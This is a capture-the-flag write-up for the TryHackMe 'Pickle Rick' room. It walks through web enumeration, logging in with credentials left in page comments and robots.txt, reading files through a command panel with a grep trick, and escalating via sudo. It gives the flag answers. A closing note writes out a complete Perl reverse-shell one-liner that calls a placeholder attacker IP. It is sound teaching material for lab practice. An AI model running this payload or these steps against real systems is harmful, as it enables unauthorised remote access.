TryHackMe – Pickle Rick Write Up

Hello friend.

This is a CTF-style room, so we don’t know a lot about it in the beginning. We need to log into the machine and find some flags. There is a web app running on it, so I take a look at it and on the index site we get our first hint in the form of an HTML comment:

The banner image is stored in the /assets directory, what can we find there? Not much, so I start dirsearch.py with the standard wordlist:

The robots.txt lists no site, but “Wubbalubbadubdub” is written in it – since we already found the username, might this be the password?

It actually is! Once we are logged in, we see a Command Panel, where you can execute shell commands. There are a few different tabs that all give us a denied message. And in the HTML of the command panel is a comment again, with a base64-encoded string:

Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0==

Well… yeah… so I put it into CyberChef and once you base64-decode it seven times you get the string “rabbit hole”. I guess that was a waste of time.
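The seven manual decoding passes can also be scripted. The following is an added example, not part of the original write-up: a hypothetical helper, peel_base64, that removes base64 layers until the text no longer looks like base64. It re-pads every layer before decoding, because a strict decoder rejects input whose "=" padding is missing or surplus.

```python
import base64
import re

# Blob from the HTML comment in the command panel, copied from the write-up.
PAGE_BLOB = "Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0=="

B64_BODY = re.compile(r"[A-Za-z0-9+/]+")


def peel_base64(blob: str, max_layers: int = 32):
    """Strip nested base64 layers; return (final_text, layers_removed).

    Heuristic: a layer counts only if it decodes to printable ASCII, so
    ordinary words that happen to use base64 characters are left alone.
    """
    text = blob
    layers = 0
    while layers < max_layers:
        body = text.strip().rstrip("=")      # drop whatever padding is present
        # Stop on characters outside the alphabet or an impossible length.
        if not B64_BODY.fullmatch(body) or len(body) % 4 == 1:
            break
        padded = body + "=" * (-len(body) % 4)   # restore canonical padding
        raw = base64.b64decode(padded, validate=True)
        try:
            decoded = raw.decode("ascii")
        except UnicodeDecodeError:
            break                            # binary output: not another layer
        if not decoded.strip().isprintable():
            break
        text, layers = decoded, layers + 1
    return text, layers


if __name__ == "__main__":
    plaintext, depth = peel_base64(PAGE_BLOB)
    print(f"{depth} layers -> {plaintext!r}")
```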

So let’s use the command panel a bit. If we run ls -la, it shows us this:

Sadly, most tools to output text don’t work, but we can browse the files in our web browser, at least those in this directory. The clue says we should browse the file system for the other ingredients and in the Sup3rS3cretPickl3Ingred.txt we find the first one:

What is the first ingredient Rick needs?

mr. meeseek hair

What is the second ingredient Rick needs?

So… I tried a few things, like getting a reverse shell, but my netcat listener just closed on connection. But I found another solution to view file content: grep -f <path to file> <path to file>. This tells grep to use each line of the file as a pattern, so if we grep a file with itself as a pattern, it prints the whole file. Kinda neat.

The second ingredient is in a file in /home/rick, so if we use grep -f /home/rick/second\ ingredients /home/rick/second\ ingredients it shows us:

1 jerry tear

What is the final ingredient Rick needs?

I looked around for a while longer and couldn’t find it. It is probably in the root directory. But we don’t have the permissions to access it. But maybe we can get them? With the sudo -l command you can see which commands your user may use in combination with the sudo command, aka root privileges:

This (ALL) NOPASSWD: ALL means he can run all commands without even entering a password, and with sudo ls /root we see there is a suspicious 3rd.txt file in the root directory. With sudo grep -f /root/3rd.txt /root/3rd.txt

That’s it! We found all the ingredients – nice.

PS: I read another write up, because I got curious why my reverse shell wouldn’t work. It seems I just didn’t try the one payload which actually works:

perl -e 'use Socket;$i="ATTACKER-IP";$p=LISTENING-PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

This way you wouldn’t need the grep trick and could just use cat:
